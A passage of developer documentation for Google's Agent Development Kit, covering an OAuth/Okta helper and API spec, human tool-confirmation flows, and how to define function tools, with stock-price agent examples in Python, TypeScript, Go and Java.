missing, raise an error indicating an unexpected event format. raise ValueError(f'Cannot get function call id from event {event}') def get_function_call_auth_config(event: Event) -> AuthConfig: """ Extracts the authentication configuration details from an 'adk_request_credential' event. Client should use this AuthConfig to necessary authentication details (like OAuth codes and state) and sent it back to the ADK to continue OAuth token exchanging. Args: event: The ADK Event object containing the 'adk_request_credential' call. Returns: An AuthConfig object populated with details from the function call arguments. Raises: ValueError: If the 'auth_config' argument cannot be found in the event. (Corrected typo from `contents` to `content` below) """ if ( event and event.content and event.content.parts and event.content.parts[0] # Use content, not contents and event.content.parts[0].function_call and event.content.parts[0].function_call.args and event.content.parts[0].function_call.args.get('auth_config') ): # Reconstruct the AuthConfig object using the dictionary provided in the arguments. # The ** operator unpacks the dictionary into keyword arguments for the constructor. return AuthConfig( **event.content.parts[0].function_call.args.get('auth_config') ) raise ValueError(f'Cannot get auth config from event {event}') ``` ```yaml openapi: 3.0.1 info: title: Okta User Info API version: 1.0.0 description: |- API to retrieve user profile information based on a valid Okta OIDC Access Token. Authentication is handled via OpenID Connect with Okta. contact: name: API Support email: support@example.com # Replace with actual contact if available servers: - url: description: Production Environment paths: /okta-jwt-user-api: get: summary: Get Authenticated User Info description: |- Fetches profile details for the user operationId: getUserInfo tags: - User Profile security: - okta_oidc: - openid - email - profile responses: '200': description: Successfully retrieved user information. content: application/json: schema: type: object properties: sub: type: string description: Subject identifier for the user. example: "abcdefg" name: type: string description: Full name of the user. example: "Example LastName" locale: type: string description: User's locale, e.g., en-US or en_US. example: "en_US" email: type: string format: email description: User's primary email address. example: "username@example.com" preferred_username: type: string description: Preferred username of the user (often the email). example: "username@example.com" given_name: type: string description: Given name (first name) of the user. example: "Example" family_name: type: string description: Family name (last name) of the user. example: "LastName" zoneinfo: type: string description: User's timezone, e.g., America/Los_Angeles. example: "America/Los_Angeles" updated_at: type: integer format: int64 # Using int64 for Unix timestamp description: Timestamp when the user's profile was last updated (Unix epoch time). example: 1743617719 email_verified: type: boolean description: Indicates if the user's email address has been verified. example: true required: - sub - name - locale - email - preferred_username - given_name - family_name - zoneinfo - updated_at - email_verified '401': description: Unauthorized. The provided Bearer token is missing, invalid, or expired. content: application/json: schema: $ref: '#/components/schemas/Error' '403': description: Forbidden. The provided token does not have the required scopes or permissions to access this resource. content: application/json: schema: $ref: '#/components/schemas/Error' components: securitySchemes: okta_oidc: type: openIdConnect description: Authentication via Okta using OpenID Connect. Requires a Bearer Access Token. openIdConnectUrl: https://your-endpoint.okta.com/.well-known/openid-configuration schemas: Error: type: object properties: code: type: string description: An error code. message: type: string description: A human-readable error message. required: - code - message ``` # Get action confirmation for ADK Tools Supported in ADKPython v1.14.0Experimental Some agent workflows require confirmation for decision making, verification, security, or general oversight. In these cases, you want to get a response from a human or supervising system before proceeding with a workflow. The *Tool Confirmation* feature in the Agent Development Kit (ADK) allows an ADK Tool to pause its execution and interact with a user or other system for confirmation or to gather structured data before proceeding. You can use Tool Confirmation with an ADK Tool in the following ways: - **[Boolean Confirmation](#boolean-confirmation):** You can configure a FunctionTool with a `require_confirmation` parameter. This option pauses the tool for a yes or no confirmation response. - **[Advanced Confirmation](#advanced-confirmation):** For scenarios requiring structured data responses, you can configure a `FunctionTool` with a text prompt to explain the confirmation and an expected response. Experimental The Tool Confirmation feature is experimental and has some [known limitations](#known-limitations). We welcome your [feedback](https://github.com/google/adk-python/issues/new?template=feature_request.md&labels=tool%20confirmation)! You can configure how a request is communicated to a user, and the system can also use [remote responses](#remote-response) sent via the ADK server's REST API. When using the confirmation feature with the ADK web user interface, the agent workflow displays a dialog box to the user to request input, as shown in Figure 1: **Figure 1.** Example confirmation response request dialog box using an advanced, tool response implementation. The following sections describe how to use this feature for the confirmation scenarios. For a complete code sample, see the [human_tool_confirmation](https://github.com/google/adk-python/blob/fc90ce968f114f84b14829f8117797a4c256d710/contributing/samples/human_tool_confirmation/agent.py) example. There are additional ways to incorporate human input into your agent workflow, for more details, see the [Human-in-the-loop](/adk-docs/agents/multi-agents/#human-in-the-loop-pattern) agent pattern. ## Boolean confirmation When your tool only requires a simple `yes` or `no` from the user, you can append a confirmation step using the `FunctionTool` class as a wrapper. For example, if you have a tool called `reimburse`, you can enable a confirmation step by wrapping it with the `FunctionTool` class and setting the `require_confirmation` parameter to `True`, as shown in the following example: ```text # From agent.py root_agent = Agent( ... tools=[ # Set require_confirmation to True to require user confirmation # for the tool call. FunctionTool(reimburse, require_confirmation=True), ], ... ``` This implementation method requires minimal code, but is limited to simple approvals from the user or confirming system. For a complete example of this approach, see the [human_tool_confirmation](https://github.com/google/adk-python/blob/fc90ce968f114f84b14829f8117797a4c256d710/contributing/samples/human_tool_confirmation/agent.py) code sample. ### Require confirmation function You can modify the behavior `require_confirmation` response by replacing its input value with a function that returns a boolean response. The following example shows a function for determining if a confirmation is required: ```text async def confirmation_threshold( amount: int, tool_context: ToolContext ) -> bool: """Returns true if the amount is greater than 1000.""" return amount > 1000 ``` This function than then be set as the parameter value for the `require_confirmation` parameter: ```text root_agent = Agent( ... tools=[ # Set require_confirmation to True to require user confirmation FunctionTool(reimburse, require_confirmation=confirmation_threshold), ], ... ``` For a complete example of this implementation, see the [human_tool_confirmation](https://github.com/google/adk-python/blob/fc90ce968f114f84b14829f8117797a4c256d710/contributing/samples/human_tool_confirmation/agent.py) code sample. ## Advanced confirmation When a tool confirmation requires more details for the user or a more complex response, use a tool_confirmation implementation. This approach extends the `ToolContext` object to add a text description of the request for the user and allows for more complex response data. When implementing tool confirmation this way, you can pause a tool's execution, request specific information, and then resume the tool with the provided data. This confirmation flow has a request stage where the system assembles and sends an input request human response, and a response stage where the system receives and processes the returned data. ### Confirmation definition When creating a Tool with an advanced confirmation, create a function that includes a ToolContext object. Then define the confirmation using a tool_confirmation object, the `tool_context.request_confirmation()` method with `hint` and `payload` parameters. These properties are used as follows: - `hint`: Descriptive message that explains what is needed from the user. - `payload`: The structure of the data you expect in return. This data type is Any and must be serializable into a JSON-formatted string, such as a dictionary or pydantic model. The following code shows an example implementation for a tool that processes time off requests for an employee: ```text def request_time_off(days: int, tool_context: ToolContext): """Request day off for the employee.""" ... tool_confirmation = tool_context.tool_confirmation if not tool_confirmation: tool_context.request_confirmation( hint=( 'Please approve or reject the tool call request_time_off() by' ' responding with a FunctionResponse with an expected' ' ToolConfirmation payload.' ), payload={ 'approved_days': 0, }, ) # Return intermediate status indicating that the tool is waiting for # a confirmation response: return {'status': 'Manager approval is required.'} approved_days = tool_confirmation.payload['approved_days'] approved_days = min(approved_days, days) if approved_days == 0: return {'status': 'The time off request is rejected.', 'approved_days': 0} return { 'status': 'ok', 'approved_days': approved_days, } ``` For a complete example of this approach, see the [human_tool_confirmation](https://github.com/google/adk-python/blob/fc90ce968f114f84b14829f8117797a4c256d710/contributing/samples/human_tool_confirmation/agent.py) code sample. Keep in mind that the agent workflow tool execution pauses while a confirmation is obtained. After confirmation is received, you can access the confirmation response in the `tool_confirmation.payload` object and then proceed with the execution of the workflow. ## Remote confirmation with REST API If there is no active user interface for a human confirmation of an agent workflow, you can handle the confirmation through a command-line interface or by routing it through another channel like email or a chat application. To confirm the tool call, the user or calling application needs to send a `FunctionResponse` event with the tool confirmation data. You can send the request to the ADK API server's `/run` or `/run_sse` endpoint, or directly to the ADK runner. The following example uses a `curl` command to send the confirmation to the `/run_sse` endpoint: ```text curl -X POST http://localhost:8000/run_sse \ -H "Content-Type: application/json" \ -d '{ "app_name": "human_tool_confirmation", "user_id": "user", "session_id": "7828f575-2402-489f-8079-74ea95b6a300", "new_message": { "parts": [ { "function_response": { "id": "adk-13b84a8c-c95c-4d66-b006-d72b30447e35", "name": "adk_request_confirmation", "response": { "confirmed": true } } } ], "role": "user" } }' ``` A REST-based response for a confirmation must meet the following requirements: - The `id` in the `function_response` should match the `function_call_id` from the `RequestConfirmation` `FunctionCall` event. - The `name` should be `adk_request_confirmation`. - The `response` object contains the confirmation status and any additional payload data required by the tool. Note: Confirmation with Resume feature If your ADK agent workflow is configured with the [Resume](/adk-docs/runtime/resume/) feature, you also must include the Invocation ID (`invocation_id`) parameter with the confirmation response. The Invocation ID you provide must be the same invocation that generated the confirmation request, otherwise the system starts a new invocation with the confirmation response. If your agent uses the Resume feature, consider including the Invocation ID as a parameter with your confirmation request, so it can be included with the response. For more details on using the Resume feature, see [Resume stopped agents](/adk-docs/runtime/resume/). ## Known limitations The tool confirmation feature has the following limitations: - [DatabaseSessionService](/adk-docs/api-reference/python/google-adk.html#google.adk.sessions.DatabaseSessionService) is not supported by this feature. - [VertexAiSessionService](/adk-docs/api-reference/python/google-adk.html#google.adk.sessions.VertexAiSessionService) is not supported by this feature. ## Next steps For more information on building ADK tools for agent workflows, see [Function tools](/adk-docs/tools-custom/function-tools/). # Function tools Supported in ADKPython v0.1.0Typescript v0.2.0Go v0.1.0Java v0.1.0 When pre-built ADK tools don't meet your requirements, you can create custom *function tools*. Building function tools allows you to create tailored functionality, such as connecting to proprietary databases or implementing unique algorithms. For example, a function tool, `myfinancetool`, might be a function that calculates a specific financial metric. ADK also supports long-running functions, so if that calculation takes a while, the agent can continue working on other tasks. ADK offers several ways to create functions tools, each suited to different levels of complexity and control: - [Function Tools](#function-tool) - [Long Running Function Tools](#long-run-tool) - [Agents-as-a-Tool](#agent-tool) ## Function Tools Transforming a Python function into a tool is a straightforward way to integrate custom logic into your agents. When you assign a function to an agent’s `tools` list, the framework automatically wraps it as a `FunctionTool`. ### How it Works The ADK framework automatically inspects your Python function's signature—including its name, docstring, parameters, type hints, and default values—to generate a schema. This schema is what the LLM uses to understand the tool's purpose, when to use it, and what arguments it requires. ### Defining Function Signatures A well-defined function signature is crucial for the LLM to use your tool correctly. #### Parameters ##### Required Parameters A parameter is considered **required** if it has a type hint but **no default value**. The LLM must provide a value for this argument when it calls the tool. The parameter's description is taken from the function's docstring. Example: Required Parameters ```python def get_weather(city: str, unit: str): """ Retrieves the weather for a city in the specified unit. Args: city (str): The city name. unit (str): The temperature unit, either 'Celsius' or 'Fahrenheit'. """ # ... function logic ... return {"status": "success", "report": f"Weather for {city} is sunny."} ``` In this example, both `city` and `unit` are mandatory. If the LLM tries to call `get_weather` without one of them, the ADK will return an error to the LLM, prompting it to correct the call. In Go, you use struct tags to control the JSON schema. The two primary tags are `json` and `jsonschema`. A parameter is considered **required** if its struct field does **not** have the `omitempty` or `omitzero` option in its `json` tag. The `jsonschema` tag is used to provide the argument's description. This is crucial for the LLM to understand what the argument is for. Example: Required Parameters ```go // GetWeatherParams defines the arguments for the getWeather tool. type GetWeatherParams struct { // This field is REQUIRED (no "omitempty"). // The jsonschema tag provides the description. Location string `json:"location" jsonschema:"The city and state, e.g., San Francisco, CA"` // This field is also REQUIRED. Unit string `json:"unit" jsonschema:"The temperature unit, either 'celsius' or 'fahrenheit'"` } ``` In this example, both `location` and `unit` are mandatory. ##### Optional Parameters A parameter is considered **optional** if you provide a **default value**. This is the standard Python way to define optional arguments. You can also mark a parameter as optional using `typing.Optional[SomeType]` or the `| None` syntax (Python 3.10+). Example: Optional Parameters ```python def search_flights(destination: str, departure_date: str, flexible_days: int = 0): """ Searches for flights. Args: destination (str): The destination city. departure_date (str): The desired departure date. flexible_days (int, optional): Number of flexible days for the search. Defaults to 0. """ # ... function logic ... if flexible_days > 0: return {"status": "success", "report": f"Found flexible flights to {destination}."} return {"status": "success", "report": f"Found flights to {destination} on {departure_date}."} ``` Here, `flexible_days` is optional. The LLM can choose to provide it, but it's not required. A parameter is considered **optional** if its struct field has the `omitempty` or `omitzero` option in its `json` tag. Example: Optional Parameters ```go // GetWeatherParams defines the arguments for the getWeather tool. type GetWeatherParams struct { // Location is required. Location string `json:"location" jsonschema:"The city and state, e.g., San Francisco, CA"` // Unit is optional. Unit string `json:"unit,omitempty" jsonschema:"The temperature unit, either 'celsius' or 'fahrenheit'"` // Days is optional. Days int `json:"days,omitzero" jsonschema:"The number of forecast days to return (defaults to 1)"` } ``` Here, `unit` and `days` are optional. The LLM can choose to provide them, but they are not required. ##### Optional Parameters with `typing.Optional` You can also mark a parameter as optional using `typing.Optional[SomeType]` or the `| None` syntax (Python 3.10+). This signals that the parameter can be `None`. When combined with a default value of `None`, it behaves as a standard optional parameter. Example: `typing.Optional` ```python from typing import Optional def create_user_profile(username: str, bio: Optional[str] = None): """ Creates a new user profile. Args: username (str): The user's unique username. bio (str, optional): A short biography for the user. Defaults to None. """ # ... function logic ... if bio: return {"status": "success", "message": f"Profile for {username} created with a bio."} return {"status": "success", "message": f"Profile for {username} created."} ``` ##### Variadic Parameters (`*args` and `**kwargs`) While you can include `*args` (variable positional arguments) and `**kwargs` (variable keyword arguments) in your function signature for other purposes, they are **ignored by the ADK framework** when generating the tool schema for the LLM. The LLM will not be aware of them and cannot pass arguments to them. It's best to rely on explicitly defined parameters for all data you expect from the LLM. #### Return Type The preferred return type for a Function Tool is a **dictionary** in Python, a **Map** in Java, or an **object** in TypeScript. This allows you to structure the response with key-value pairs, providing context and clarity to the LLM. If your function returns a type other than a dictionary, the framework automatically wraps it into a dictionary with a single key named **"result"**. Strive to make your return values as descriptive as possible. *For example,* instead of returning a numeric error code, return a dictionary with an "error_message" key containing a human-readable explanation. **Remember that the LLM**, not a piece of code, needs to understand the result. As a best practice, include a "status" key in your return dictionary to indicate the overall outcome (e.g., "success", "error", "pending"), providing the LLM with a clear signal about the operation's state. #### Docstrings The docstring of your function serves as the tool's **description** and is sent to the LLM. Therefore, a well-written and comprehensive docstring is crucial for the LLM to understand how to use the tool effectively. Clearly explain the purpose of the function, the meaning of its parameters, and the expected return values. ### Passing Data Between Tools When an agent calls multiple tools in a sequence, you might need to pass data from one tool to another. The recommended way to do this is by using the `temp:` prefix in the session state. A tool can write data to a `temp:` variable, and a subsequent tool can read it. This data is only available for the current invocation and is discarded afterwards. Shared Invocation Context All tool calls within a single agent turn share the same `InvocationContext`. This means they also share the same temporary (`temp:`) state, which is how data can be passed between them. ### Example Example This tool is a python function which obtains the Stock price of a given Stock ticker/ symbol. Note: You need to `pip install yfinance` library before using this tool. ```python # Copyright 2025 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from google.adk.agents import Agent from google.adk.runners import Runner from google.adk.sessions import InMemorySessionService from google.genai import types import yfinance as yf APP_NAME = "stock_app" USER_ID = "1234" SESSION_ID = "session1234" def get_stock_price(symbol: str): """ Retrieves the current stock price for a given symbol. Args: symbol (str): The stock symbol (e.g., "AAPL", "GOOG"). Returns: float: The current stock price, or None if an error occurs. """ try: stock = yf.Ticker(symbol) historical_data = stock.history(period="1d") if not historical_data.empty: current_price = historical_data['Close'].iloc[-1] return current_price else: return None except Exception as e: print(f"Error retrieving stock price for {symbol}: {e}") return None stock_price_agent = Agent( model='gemini-2.0-flash', name='stock_agent', instruction= 'You are an agent who retrieves stock prices. If a ticker symbol is provided, fetch the current price. If only a company name is given, first perform a Google search to find the correct ticker symbol before retrieving the stock price. If the provided ticker symbol is invalid or data cannot be retrieved, inform the user that the stock price could not be found.', description='This agent specializes in retrieving real-time stock prices. Given a stock ticker symbol (e.g., AAPL, GOOG, MSFT) or the stock name, use the tools and reliable data sources to provide the most up-to-date price.', tools=[get_stock_price], # You can add Python functions directly to the tools list; they will be automatically wrapped as FunctionTools. ) # Session and Runner async def setup_session_and_runner(): session_service = InMemorySessionService() session = await session_service.create_session(app_name=APP_NAME, user_id=USER_ID, session_id=SESSION_ID) runner = Runner(agent=stock_price_agent, app_name=APP_NAME, session_service=session_service) return session, runner # Agent Interaction async def call_agent_async(query): content = types.Content(role='user', parts=[types.Part(text=query)]) session, runner = await setup_session_and_runner() events = runner.run_async(user_id=USER_ID, session_id=SESSION_ID, new_message=content) async for event in events: if event.is_final_response(): final_response = event.content.parts[0].text print("Agent Response: ", final_response) # Note: In Colab, you can directly use 'await' at the top level. # If running this code as a standalone Python script, you'll need to use asyncio.run() or manage the event loop. await call_agent_async("stock price of GOOG") ``` The return value from this tool will be wrapped into a dictionary. ```json {"result": "$123"} ``` This tool retrieves the mocked value of a stock price. ```typescript /** * Copyright 2025 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ import {Content, Part, createUserContent} from '@google/genai'; import { stringifyContent, FunctionTool, InMemoryRunner, LlmAgent, } from '@google/adk'; import {z} from 'zod'; // Define the function to get the stock price async function getStockPrice({ticker}: {ticker: string}): Promise> { console.log(`Getting stock price for ${ticker}`); // In a real-world scenario, you would fetch the stock price from an API const price = (Math.random() * 1000).toFixed(2); return {price: `$${price}`}; } async function main() { // Define the schema for the tool's parameters using Zod const getStockPriceSchema = z.object({ ticker: z.string().describe('The stock ticker symbol to look up.'), }); // Create a FunctionTool from the function and schema const stockPriceTool = new FunctionTool({ name: 'getStockPrice', description: 'Gets the current price of a stock.', parameters: getStockPriceSchema, execute: getStockPrice, }); // Define the agent that will use the tool const stockAgent = new LlmAgent({ name: 'stock_agent', model: 'gemini-2.5-flash', instruction: 'You can get the stock price of a company.', tools: [stockPriceTool], }); // Create a runner for the agent const runner = new InMemoryRunner({agent: stockAgent}); // Create a new session const session = await runner.sessionService.createSession({ appName: runner.appName, userId: 'test-user', }); const userContent: Content = createUserContent('What is the stock price of GOOG?'); // Run the agent and get the response const response = []; for await (const event of runner.runAsync({ userId: session.userId, sessionId: session.id, newMessage: userContent, })) { response.push(event); } // Print the final response from the agent const finalResponse = response[response.length - 1]; if (finalResponse?.content?.parts?.length) { console.log(stringifyContent(finalResponse)); } } main(); ``` The return value from this tool will be an object. ```json For input `GOOG`: {"price": 2800.0, "currency": "USD"} ``` This tool retrieves the mocked value of a stock price. ```go import ( "google.golang.org/adk/agent" "google.golang.org/adk/agent/llmagent" "google.golang.org/adk/model/gemini" "google.golang.org/adk/runner" "google.golang.org/adk/session" "google.golang.org/adk/tool" "google.golang.org/adk/tool/functiontool" "google.golang.org/genai" ) // Copyright 2025 Google LLC // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. package main import ( "context" "fmt" "log" "strings" "google.golang.org/adk/agent" "google.golang.org/adk/agent/llmagent" "google.golang.org/adk/model/gemini" "google.golang.org/adk/runner" "google.golang.org/adk/session" "google.golang.org/adk/tool" "google.golang.org/adk/tool/agenttool" "google.golang.org/adk/tool/functiontool" "google.golang.org/genai" ) // mockStockPrices provides a simple in-memory database of stock prices // to simulate a real-world stock data API. This allows the example to // demonstrate tool functionality without making external network calls. var mockStockPrices = map[string]float64{ "GOOG": 300.6, "AAPL": 123.4, "MSFT": 234.5, } // getStockPriceArgs defines the schema for the arguments passed to the getStockPrice tool. // Using a struct is the recommended approach in the Go ADK as it provides strong // typing and clear validation for the expected inputs. type getStockPriceArgs struct { Symbol string `json:"symbol" jsonschema:"The stock ticker symbol, e.g., GOOG"` } // getStockPriceResults defines the output schema for the getStockPrice tool. type getStockPriceResults struct { Symbol string `json:"symbol"` Price float64 `json:"price,omitempty"` Error string `json:"error,omitempty"` } // getStockPrice is a tool that retrieves the stock price for a given ticker symbol // from the mockStockPrices map. It demonstrates how a function can be used as a // tool by an agent. If the symbol is found, it returns a struct containing the // symbol and its price. Otherwise, it returns a struct with an error message. func getStockPrice(ctx tool.Context, input getStockPriceArgs) (getStockPriceResults, error) { symbolUpper := strings.ToUpper(input.Symbol) if price, ok := mockStockPrices[symbolUpper]; ok { fmt.Printf("Tool: Found price for %s: %f\n", input.Symbol, price) return getStockPriceResults{Symbol: input.Symbol, Price: price}, nil } return getStockPriceResults{}, fmt.Errorf("no data found for symbol") } // createStockAgent initializes and configures an LlmAgent. // This agent is equipped with the getStockPrice tool and is instructed // on how to respond to user queries about stock prices. It uses the // Gemini model to understand user intent and decide when to use its tools. func createStockAgent(ctx context.Context) (agent.Agent, error) { stockPriceTool, err := functiontool.New( functiontool.Config{ Name: "get_stock_price", Description: "Retrieves the current stock price for a given symbol.", }, getStockPrice) if err != nil { return nil, err } model, err := gemini.NewModel(ctx, "gemini-2.5-flash", &genai.ClientConfig{}) if err != nil { log.Fatalf("Failed to create model: %v", err) } return llmagent.New(llmagent.Config{ Name: "stock_agent", Model: model, Instruction: "You are an agent who retrieves stock prices. If a ticker symbol is provided, fetch the current price. If only a company name is given, first perform a Google search to find the correct ticker symbol before retrieving the stock price. If the provided ticker symbol is invalid or data cannot be retrieved, inform the user that the stock price could not be found.", Description: "This agent specializes in retrieving real-time stock prices. Given a stock ticker symbol (e.g., AAPL, GOOG, MSFT) or the stock name, use the tools and reliable data sources to provide the most up-to-date price.", Tools: []tool.Tool{ stockPriceTool, }, }) } // userID and appName are constants used to identify the user and application // throughout the session. These values are important for logging, tracking, // and managing state across different agent interactions. const ( userID = "example_user_id" appName = "example_app" ) // callAgent orchestrates the execution of the agent for a given prompt. // It sets up the necessary services, creates a session, and uses a runner // to manage the agent's lifecycle. It streams the agent's responses and // prints them to the console, handling any potential errors during the run. func callAgent(ctx context.Context, a agent.Agent, prompt string) { sessionService := session.InMemoryService() // Create a new session for the agent interactions. session, err := sessionService.Create(ctx, &session.CreateRequest{ AppName: appName, UserID: userID, }) if err != nil { log.Fatalf("Failed to create the session service: %v", err) } config := runner.Config{ AppName: appName, Agent: a, SessionService: sessionService, } // Create the runner to manage the agent execution. r, err := runner.New(config) if err != nil { log.Fatalf("Failed to create the runner: %v", err) } sessionID := session.Session.ID() userMsg := &genai.Content{ Parts: []*genai.Part{ genai.NewPartFromText(prompt), }, Role: string(genai.RoleUser), } for event, err := range r.Run(ctx, userID, sessionID, userMsg, agent.RunConfig{ StreamingMode: agent.StreamingModeNone, }) { if err != nil { fmt.Printf("\nAGENT_ERROR: %v\n", err) } else { for _, p := range event.Content.Parts { fmt.Print(p.Text) } } } } // RunAgentSimulation serves as the entry point for this example. // It creates the stock agent and then simulates a series of user interactions // by sending different prompts to the agent. This function showcases how the // agent responds to various queries, including both successful and unsuccessful // attempts to retrieve stock prices. func RunAgentSimulation() { // Create the stock agent agent, err := createStockAgent(context.Background()) if err != nil { panic(err) } fmt.Println("Agent created:", agent.Name()) prompts := []string{ "stock price of GOOG", "What's the price of MSFT?", "Can you find the stock price for an unknown company XYZ?", } // Simulate running the agent with different prompts for _, prompt := range prompts { fmt.Printf("\nPrompt: %s\nResponse: ", prompt) callAgent(context.Background(), agent, prompt) fmt.Println("\n---") } } // createSummarizerAgent creates an agent whose sole purpose is to summarize text. func createSummarizerAgent(ctx context.Context) (agent.Agent, error) { model, err := gemini.NewModel(ctx, "gemini-2.5-flash", &genai.ClientConfig{}) if err != nil { return nil, err } return llmagent.New(llmagent.Config{ Name: "SummarizerAgent", Model: model, Instruction: "You are an expert at summarizing text. Take the user's input and provide a concise summary.", Description: "An agent that summarizes text.", }) } // createMainAgent creates the primary agent that will use the summarizer agent as a tool. func createMainAgent(ctx context.Context, tools ...tool.Tool) (agent.Agent, error) { model, err := gemini.NewModel(ctx, "gemini-2.5-flash", &genai.ClientConfig{}) if err != nil { return nil, err } return llmagent.New(llmagent.Config{ Name: "MainAgent", Model: model, Instruction: "You are a helpful assistant. If you are asked to summarize a long text, use the 'summarize' tool. " + "After getting the summary, present it to the user by saying 'Here is a summary of the text:'.", Description: "The main agent that can delegate tasks.", Tools: tools, }) } func RunAgentAsToolSimulation() { ctx := context.Background() // 1. Create the Tool Agent (Summarizer) summarizerAgent, err := createSummarizerAgent(ctx) if err != nil { log.Fatalf("Failed to create summarizer agent: %v", err) } // 2. Wrap the Tool Agent in an AgentTool summarizeTool := agenttool.New(summarizerAgent, &agenttool.Config{ SkipSummarization: true, }) // 3. Create the Main Agent and provide it with the AgentTool mainAgent, err := createMainAgent(ctx, summarizeTool) if err != nil { log.Fatalf("Failed to create main agent: %v", err) } // 4. Run the main agent prompt := ` Please summarize this text for me: Quantum computing represents a fundamentally different approach to computation, leveraging the bizarre principles of quantum mechanics to process information. Unlike classical computers that rely on bits representing either 0 or 1, quantum computers use qubits which can exist in a state of superposition - effectively being 0, 1, or a combination of both simultaneously. Furthermore, qubits can become entangled, meaning their fates are intertwined regardless of distance, allowing for complex correlations. This parallelism and interconnectedness grant quantum computers the potential to solve specific types of incredibly complex problems - such as drug discovery, materials science, complex system optimization, and breaking certain types of cryptography - far faster than even the most powerful classical supercomputers could ever achieve, although the technology is still largely in its developmental stages. ` fmt.Printf("\nPrompt: %s\nResponse: ", prompt) callAgent(context.Background(), mainAgent, prompt) fmt.Println("\n---") } func main() { fmt.Println("Attempting to run the agent simulation...") RunAgentSimulation() fmt.Println("\nAttempting to run the agent-as-a-tool simulation...") RunAgentAsToolSimulation() } ``` The return value from this tool will be a `getStockPriceResults` instance. ```json For input `{"symbol": "GOOG"}`: {"price":300.6,"symbol":"GOOG"} ``` This tool retrieves the mocked value of a stock price. ```java import com.google.adk.agents.LlmAgent; import com.google.adk.events.Event; import com.google.adk.runner.InMemoryRunner; import com.google.adk.sessions.Session; import com.google.adk.tools.Annotations.Schema; import com.google.adk.tools.FunctionTool; import com.google.genai.types.Content; import com.google.genai.types.Part; import io.reactivex.rxjava3.core.Flowable; import java.util.HashMap; import java.util.Map; public class StockPriceAgent { private static final String APP_NAME = "stock_agent"; private static final String USER_ID = "user1234"; // Mock data for various stocks functionality // NOTE: This is a MOCK implementation. In a real Java application, // you would use a financial data API or library. private static final Map mockStockPrices = new HashMap<>(); static { mockStockPrices.put("GOOG", 1.0); mockStockPrices.put("AAPL", 1.0); mockStockPrices.put("MSFT", 1.0); } @Schema(description = "Retrieves the current stock price for a given symbol.") public static Map getStockPrice( @Schema(description = "The stock symbol (e.g., \"AAPL\", \"GOOG\")", name = "symbol") String symbol) { try { if (mockStockPrices.containsKey(symbol.toUpperCase())) { double currentPrice = mockStockPrices.get(symbol.toUpperCase()); System.out.println("Tool: Found price for " + symbol + ": " + currentPrice); return Map.of("symbol", symbol, "price", currentPrice); } else { return Map.of("symbol", symbol, "error", "No data found for symbol"); } } catch (Exception e) { return Map.of("symbol", symbol, "error", e.getMessage()); } } public static void callAgent(String prompt) { // Create the FunctionTool from the Java method FunctionTool getStockPriceTool = FunctionTool.create(StockPriceAgent.class, "getStockPrice"); LlmAgent stockPriceAgent = LlmAgent.builder() .model("gemini-2.0-flash") .name("stock_agent") .instruction( "You are an agent who retrieves stock prices. If a ticker symbol is provided, fetch the current price. If only a company name is given, first perform a Google search to find the correct ticker symbol before retrieving the stock price. If the provided ticker symbol is invalid or data cannot be retrieved, inform the user that the stock price could not be found.") .description( "This agent specializes in retrieving real-time stock prices. Given a stock ticker symbol (e.g., AAPL, GOOG, MSFT) or the stock name, use the tools and reliable data sources to provide the most up-to-date price.") .tools(getStockPriceTool) // Add the Java FunctionTool .build(); // Create an InMemoryRunner InMemoryRunner runner = new InMemoryRunner(stockPriceAgent, APP_NAME); // InMemoryRunner automatically creates a session service. Create a session using the service Session session = runner.sessionService().createSession(APP_NAME, USER_ID).blockingGet(); Content userMessage = Content.fromParts(Part.fromText(prompt)); // Run the agent Flowable eventStream = runner.runAsync(USER_ID, session.id(), userMessage); // Stream event response eventStream.blockingForEach( event -> { if (event.finalResponse()) { System.out.println(event.stringifyContent()); } }); } public static void main(String[] args) { callAgent("stock price of GOOG"); callAgent("What's the price of MSFT?"); callAgent("Can you find the stock price for an unknown company XYZ?"); } } ``` The return value from this tool will be wrapped into a Map. ```json For input `GOOG`: {"symbol": "GOOG", "price": "1.0"} ``` ### Best Practices While you have considerable flexibility in defining your function, remember that simplicity enhances usability for the LLM. Consider these guidelines: - **Fewer Parameters are Better:** Minimize the number of parameters to reduce complexity. - **Simple Data Types:** Favor primitive data types like `str` and `int` over custom classes whenever possible. - **Meaningful Names:** The function's name and parameter names significantly influence how the LLM interprets and utilizes the tool. Choose names that clearly reflect the function's purpose and the meaning of its inputs. Avoid generic names like `do_stuff()` or `beAgent()`. - **Build for Parallel Execution:** Improve function calling performance when multiple tools are run by building for asynchronous operation. For information on enabling parallel execution for tools, see [Increase tool performance with parallel execution](/adk-docs/tools-custom/performance/). ## Long Running Function Tools This tool is designed to help you start and manage tasks that are handled outside the operation of your agent workflow, and require a significant amount of processing time, without blocking the agent's execution. This tool is a subclass of `FunctionTool`. When using a `LongRunningFunctionTool`, your function can initiate the long-running operation and optionally return an **initial result**, such as a long-running operation id. Once a long running function tool is invoked the agent runner pauses the agent run and lets the agent client to decide whether to continue or wait until the long-running operation finishes. The agent client can query the progress of the long-running operation and send back an intermediate or final response. The agent can then continue with other tasks. An example is the human-in-the-loop scenario where the agent needs human approval before proceeding with a task. Warning: Execution handling Long Running Function Tools are designed to help you start and *manage* long running tasks as part of your agent workflow, but ***not perform*** the actual, long task. For tasks that require significant time to complete, you should implement a separate server to do the task. Tip: Parallel execution Depending on the type of tool you are building, designing for asynchronous operation may be a better solution than creating a long running tool. For more information, see [Increase tool performance with parallel execution](/adk-docs/tools-custom/performance/). ### How it Works In Python, you 